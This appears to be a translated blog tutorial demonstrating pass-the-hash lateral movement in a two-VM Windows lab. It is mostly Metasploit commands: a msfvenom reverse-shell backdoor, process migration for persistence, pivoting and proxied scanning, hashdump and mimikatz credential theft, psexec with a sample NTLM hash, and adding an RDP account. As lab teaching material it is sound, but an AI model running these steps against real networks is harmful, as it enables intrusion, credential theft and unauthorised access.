Intranet penetration test small Demo hash delivery attack

Environment construction

Win Server2003

Set account password

Right click my computer, select manage, add local users and groups, and reset the password of admin to 123456 to facilitate subsequent operations

Add a network card for the virtual machine in vmware, and select the LAN section for the network connection

After power on, manually set the IP address to


Win Server2008

Select LAN section for virtual machine network connection, and manually set IP address to after startup

Note: the network connection of two virtual machines can also be selected, and only the host mode can also be selected. The specific configuration is determined by yourself

Take the shell

It is known that win werver2003 has a file upload vulnerability and has been used by getshell

Generate backdoor files using MSF

Generate backdoor files in Kali

msfvenom  -p windows/meterpreter/reverse_tcp lhost=  lport=12345 -f exe >/var/www/html/s.exe

After generation, upload the file to the win server through webshell

kali enters msf and starts listening

use exploit/multi/handler
set payload  windows/meterpreter/reverse_tcp
set lhost
set lport 12345

When you click the exe file on the win server, it will go online

Collect information

  • system information


  • View routing table information


  • View process


    If it fails, you can enter the shell and use tasklist to view it

Injection process maintenance permissions

Generally, it is injected into the explorer.exe process

migrate 2424

After successful injection, the shell will be started every time the explorer.exe process is started

Collect Intranet Information

  • View routing table

    run autoroute -p 
  • Detect intranet survival

    # By ping command
    run post/multi/gather/ping_sweep RHOSTS=
    # Through arp Protocol
    run post/windows/gather/arp_scanner RHOSTS=
    # View module information using info
    info post/multi/gather/ping_sweep

  • Proxy nmap scan

    Add route

    run autoroute -s
    use auxiliary/server/socks4a 
    set SRVPORT 10044

    Modify profile

    vi /etc/prxoychains.conf

    Comment out the original and add a new one

    socks4 10044

    In this way, the route is added

    Use nmap to scan the IP detected by the last command one by one

    proxychains nmap -sT -Pn --open -oN
     Save to in

Through port scanning, it is found that port 445 is open. Try to attack

Hash delivery attack

PTH is pass the hash. The principle is that attackers can directly access remote hosts or services through LM Hash and NTLM Hash without providing plaintext password

Get hash value using MSF

meterpreter > hashdump 

Select payload and use the account password hash of winserver 2003 to attack winserver 2008, because there are a large number of hosts with the same password in the Intranet environment. When we obtain a hash, we can use the hash to penetrate horizontally

use exploit/windows/smb/psexec
set payload windows/meterpreter/bind_tcp
show options                      -->View configuration options
set RHOST		         -->Set attack target IP,Port default 445
set SMBUser Administrator         -->Set account number as wing
set SMBPass 44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4

The attack gets another session

hash decryption website:

The second half is encrypted data


mimikatz can be loaded directly in msf

meterpreter > load mimikatz 
meterpreter > msv
meterpreter > kerberos 

Start RDP with command

run  getgui  -e
 Add account
run getgui -u moonsec -p moonsec

Port forwarding

portfwd add -l 5555 -p 3389 -r
rdesktop -u Administrator -p 123qwe
proxychains rdesktop -u Administrator -p 123456

Recommended reading

Research on horizontal mobility hash delivery attack of Intranet penetration

Introduction to the principle of passing hash attack

Tags: Linux bash Cyber Security

Posted on Fri, 26 Nov 2021 18:50:56 -0500 by kbc1